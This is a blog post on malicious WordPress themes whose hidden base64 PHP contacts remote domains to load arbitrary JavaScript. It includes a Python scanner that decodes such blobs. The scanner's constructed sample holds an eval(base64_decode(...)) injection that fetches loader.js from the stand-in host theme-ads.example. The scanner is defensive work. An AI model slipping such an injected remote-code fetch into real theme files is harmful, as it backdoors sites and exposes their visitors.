Vicious WordPress Designs

Wow. This was a new one in my world. I just read the article at gigaom.com about how innocent-looking WordPress themes sometimes carry a nasty payload that opens the door for the evil designer to upload any kind of code to the victim's WordPress server. Scary indeed, but a very well written article.

Allow me to quote their example…

Seattle-based designer Derek Punsalan makes acclaimed WordPress themes, and has released several of them to the world. Other theme sites have copied his themes. One such theme copier is WP-Sphere.

When you download Punsalan’s theme from the WP-Sphere site, it contains some extra code that he didn’t include. It’s a long string of cryptic-looking characters that most users wouldn’t question:

[Image: Hexcode example of exploit for WordPress theme]

The first part of the string offers a clue: It’s using a PHP function to decode the string of text, which is encoded as base64. If we pass this through a decoder, the string looks a lot more malicious:

[Image: Detailed example of the payload after decryption]

The code establishes a connection from the WordPress server to several sites (wpssr.com, wpsnc.com, and wpsnc2.com), and allows the site operator to download an arbitrary piece of JavaScript. The sites are registered to an anonymous registrar in Vancouver, British Columbia.

Any advice?

Well, fear not. Unless you insist on very special site designs, you can get a truckload of them through the official WordPress Theme Gallery, and if you are into customizing anything, you will probably be able to spot strange encoded strings in the files delivered as part of a new theme package.
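As an added example (not code from this post or from the gigaom article), here is a small Python triage script in the spirit of that advice: it looks for base64 blobs handed to base64_decode() in a theme's PHP files, decodes them, and rates the ones that are eval'd and reach out to a remote host as high severity. The sample footer.php and the theme-ads.example domain are constructed placeholders, not material from the article.

```python
import base64
import re
from pathlib import Path

# Plain eval(base64_decode("...")) pattern; obfuscators vary, so treat
# this as a first-pass triage filter, not as proof that a theme is clean.
SUSPICIOUS = re.compile(
    r"(?P<eval>eval\s*\(\s*)?base64_decode\s*\(\s*['\"]"
    r"(?P<blob>[A-Za-z0-9+/=\s]{20,})['\"]\s*\)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


def scan_source(source: str) -> list[dict]:
    """Return one finding per encoded blob, with its decoded text and any URLs."""
    findings = []
    for match in SUSPICIOUS.finditer(source):
        blob = re.sub(r"\s+", "", match.group("blob"))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64; still worth a manual look
            decoded = ""
        urls = sorted(set(URL_RE.findall(decoded)))
        evaluated = match.group("eval") is not None
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "evaluated": evaluated,
            "decoded": decoded,
            "urls": urls,
            # decoded code that is executed and contacts a remote host is
            # exactly the shape the quoted write-up describes
            "severity": "high" if evaluated and urls else "medium",
        })
    return findings


def scan_theme(theme_dir: str) -> dict[str, list[dict]]:
    """Scan every PHP file under a theme directory; keys are relative paths."""
    root = Path(theme_dir)
    results = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            results[str(path.relative_to(root))] = found
    return results


# Constructed sample of a tampered footer.php (not a real theme file).
_INJECTED = b'echo file_get_contents("http://theme-ads.example/loader.js");'
SAMPLE_FOOTER = (
    '<?php\necho "Powered by WordPress";\n'
    'eval(base64_decode("' + base64.b64encode(_INJECTED).decode() + '"));\n?>'
)

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_FOOTER):
        print(f"line {finding['line']}: {finding['severity']} -> {finding['decoded']}")
```

Run scan_theme() against an unpacked theme directory before activating it; a "high" finding is a reason to read the decoded text, not to keep the theme.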

The online society is becoming just like the real world – there are a lot of bad people out there, so watch yourself. A new visitor in town would never take the dark alleys either.

Maybe somebody should maintain a list of criminals though – i.e. theme sites hosting the malware-infected themes. At least we would then have some kind of warning … there is no such thing as an efficient online police force to call upon.